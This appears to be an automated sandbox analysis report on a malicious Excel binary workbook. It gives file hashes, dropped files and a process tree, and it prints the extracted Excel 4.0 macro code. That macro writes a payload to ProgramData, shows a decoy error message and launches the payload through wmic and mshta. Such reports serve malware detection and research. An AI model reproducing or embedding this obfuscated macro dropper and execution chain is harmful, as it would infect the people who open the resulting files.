                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):140183
                                                                                                                                                              Entropy (8bit):5.357927454086073
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:XcQIfgxrBdA3gBwtnQ9DQW+zCA4Ff7nXbovidXiE6LWmE9:FuQ9DQW+zcXfH
                                                                                                                                                              MD5:AA1E3097C431DB3CB150864689627F50
                                                                                                                                                              SHA1:2B60476BD0560F6076E1BC91FCA3949D6422ACD9
                                                                                                                                                              SHA-256:58702FB28EE1B0B4231250F242AFA5A0A4BAE508B7F0EDA2FDC5392972D071F3
                                                                                                                                                              SHA-512:39D7BD8E8EC52465C8FD94F42BB045307EBF36BFAAA96F3ACAE9A97150442C845AE9F6937B75D0FE807D573DC8C0E043D4CB20D017FA94A295739D10EFD88438
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T11:57:02">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\59FECB3D.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 800 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):46618
                                                                                                                                                              Entropy (8bit):7.952644920400089
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:Luo+bYjgUZIXsg6KJLDTRxSKj91uKHacXGaFI9mJveLsTpqurZ1G8JawY1B:LujUjtZIcK9TjSK+ua7aFIMKIpq3HH
                                                                                                                                                              MD5:BD23AADA4497DF81DFF5354688F31E37
                                                                                                                                                              SHA1:666BAD186C4E60B5C2E35D9B4D5B636750873112
                                                                                                                                                              SHA-256:8460FE3B20B18F3BC0A7C66B29AB9AD503CB5DA8C511BC45987DAF4647E00560
                                                                                                                                                              SHA-512:6795A07A5FBD76D9F0A4E5056685585B3C66400E69AFB9139613DDA0A887F0018FBAD824C0377C9E1FA971A004911DF5474334824DA409EFEA6AB27092F14BCE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: .PNG........IHDR... .........V%.4....IDATx...w..G...OUu..l.VY.%... ..c..`.lc....L4&\........H..6...`0... ....j.if......Q.r.jW.._..vB.t....+....#..u.Q......0.._".RJ)..Rj......k.Y.q....zT)..RJ)..". J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..RcF..RJ)..Rj.h.QJ)..RJ... J)..RJ.1..D)..RJ)5f4.(..RJ)......RJ)......RJ)...3.@.RJ)..Rc&..;......`A"......{..RJ..L..Rj... ....L6....!J)..zl
                                                                                                                                                              C:\Users\user\Desktop\~$4310352755503838173672.xlsb
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              \Device\ConDrv
                                                                                                                                                              Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):160
                                                                                                                                                              Entropy (8bit):5.083203110114614
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnXR/JQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egNeAiv/
                                                                                                                                                              MD5:C9157C8B0DCCF553D0B379A71A06E5E3
                                                                                                                                                              SHA1:47920AD40A79287D2429496C06CA07E1CC2E230F
                                                                                                                                                              SHA-256:AA69D1D630F1D62A4AD91961EB222B2923CE73F2B368C0DFD47C159A94A94136
                                                                                                                                                              SHA-512:436555954B1EA100B937CA1FD14998244D0BEBBDA33E4A62C11CD94802A399A66A39EBD2475FD424840AF40EBD1AF7260766E0E84A1E84FA4431078603133230
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5244;...ReturnValue = 0;..};....

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                                              Entropy (8bit):7.8592249378591506
                                                                                                                                                              TrID:
                                                                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                              • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                              • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                              File name:4310352755503838173672.xlsb
                                                                                                                                                              File size:76354
                                                                                                                                                              MD5:88a363b14590b0c0aab8d954ac3e1b5c
                                                                                                                                                              SHA1:af7b370945a8bcec0a979c93ef83770073f2b08a
                                                                                                                                                              SHA256:1004873035711456c20f311b16484154554d13e060dd2bbb2c0c2ddd4e73ced4
                                                                                                                                                              SHA512:c77136404c44801589199bb04ce1fc58b7da7bd3b67b402a62336fd3ec4357082637c183ec2e1cd369eb9808e08eb9e387a31df62897fe59ac5b24b773dbf85f
                                                                                                                                                              SSDEEP:1536:8pWJhitOVrujUjtZIcK9TjSK+ua7aFIMKIpq3HZF5dtu:bJw4ACK9xKI2ZF5dtu
                                                                                                                                                              File Content Preview:PK..........!.m\.%............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OpenXML
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "4310352755503838173672.xlsb"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:
                                                                                                                                                              Application Name:
                                                                                                                                                              Encrypted Document:
                                                                                                                                                              Contains Word Document Stream:
                                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:

                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                              0,564,=FOPEN(CHAR(67) & "" & CHAR(58) & "\ProgramData\lvDMlI" & CHAR(68) & "BF" & CHAR(46) & "rt" & CHAR(102), 3)
3,564,=B9227+D1716
7,564,=C1683+A6201
8,564,=C9778+D1874
10,564,=FOR.CELL("BqjyNef",Sheet1!CJ166:EO248, TRUE)
12,564,=D2396+A5369
13,564,=C9779+B2256
16,564,=D5029+B8131
18,564,=B512+C1310
19,564,=C4151+A9110
20,564,=FWRITE(0,CHAR(BqjyNef))
23,564,=A9409+B5628
24,564,=B400+B7779
25,564,=B3837+A5424
26,564,=B3794+B68
27,564,=B4006+C2851
31,564,=NEXT()
32,564,=A2203+C9084
33,564,=A6170+C4158
34,564,=B190+C4717
36,564,=C9207+D2156
37,564,=D2252+A5157
38,564,=B3284+B4506
41,564,=C8747+D6122
44,564,=D625+B8100
45,564,=A5167+B7705
46,564,=ALERT("Error! Sending report " & CHAR(116) & CHAR(111) & " Micros" & CHAR(111) & "ft...")
48,564,=A7505+B4178
49,564,=C6293+D9181
51,564,=B5726+A9482
52,564,=C6705+A9064
53,564,=B3593+A529
54,564,=D7586+D6975
57,564,=D9301+D1736
58,564,=B7822+B810
60,564,=EXEC(CHAR(119) & CHAR(109) & CHAR(105) & "c process call create" & CHAR(32) & CHAR(34) & "msh" & CHAR(116) & CHAR(97) & "" & CHAR(32) & CHAR(67) & ":\Program" & CHAR(68) & "at" & CHAR(97) & "" & CHAR(92) & "lvD" & CHAR(77) & "lID" & CHAR(66) & "F.r" & CHAR(116) & CHAR(102) & CHAR(34))
61,564,=B8804+A5152
66,564,=D5361+A6822
69,564,=B3775+A7830
70,564,=RETURN()

                                                                                                                                                              Network Behavior

                                                                                                                                                              No network behavior found

                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 6980 Parent PID: 800

                                                                                                                                                              General

                                                                                                                                                              Start time:12:56:59
                                                                                                                                                              Start date:02/12/2021
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                              Imagebase:0x8a0000
                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: WMIC.exe PID: 2588 Parent PID: 6980

                                                                                                                                                              General

                                                                                                                                                              Start time:12:57:58
                                                                                                                                                              Start date:02/12/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"
                                                                                                                                                              Imagebase:0xa70000
                                                                                                                                                              File size:391680 bytes
                                                                                                                                                              MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: conhost.exe PID: 128 Parent PID: 2588

                                                                                                                                                              General

                                                                                                                                                              Start time:12:57:58
                                                                                                                                                              Start date:02/12/2021
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                                                              File size:625664 bytes
                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: mshta.exe PID: 5244 Parent PID: 5060

                                                                                                                                                              General

                                                                                                                                                              Start time:12:57:59
                                                                                                                                                              Start date:02/12/2021
                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:mshta C:\ProgramData\lvDMlIDBF.rtf
                                                                                                                                                              Imagebase:0x7ff727c10000
                                                                                                                                                              File size:14848 bytes
                                                                                                                                                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >

                                                                                                                                                                Analysis Process: EXCEL.EXE PID: 6980 Parent PID: 800 EXCEL.EXECOMMON

                                                                                                                                                                Executed Functions

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 0F886648, Relevance: 5.1, Strings: 3, Instructions: 1322COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000003.852550622.000000000F87F000.00000004.00000001.sdmp, Offset: 0F882000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_3_f882000_EXCEL.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4$M$f
                                                                                                                                                                • API String ID: 0-2426989162
                                                                                                                                                                • Opcode ID: 2bc8301b3266d4a1df79b27f26c44deee8924bc1daf31a95212e630fbb36fce6
                                                                                                                                                                • Instruction ID: cc9ad9c06734597edeb5651e61c07ba4d48cb0214f7c8672a7690e176470a693
                                                                                                                                                                • Opcode Fuzzy Hash: 2bc8301b3266d4a1df79b27f26c44deee8924bc1daf31a95212e630fbb36fce6
                                                                                                                                                                • Instruction Fuzzy Hash: B572D99684E3C15FD7138B7458792907FB0AE23258B4F86CBC4C0CF4A3E2199A5AD363
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0F885B9E, Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000003.852550622.000000000F87F000.00000004.00000001.sdmp, Offset: 0F882000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_3_f882000_EXCEL.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 80568c7c8d9f4ee8f75724f61c80c8df5f89f4386c408b8af859c7c128c4befb
                                                                                                                                                                • Instruction ID: 513ae5a20d5e079b2384bd1e9dacbfd442fa1fed0086e4100f699184d549a9e1
                                                                                                                                                                • Opcode Fuzzy Hash: 80568c7c8d9f4ee8f75724f61c80c8df5f89f4386c408b8af859c7c128c4befb
                                                                                                                                                                • Instruction Fuzzy Hash: 1C31D23240A6C09FCB26DF35C5515CA7FB6FF8631475988D9C480DE427C366A91ACB42
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%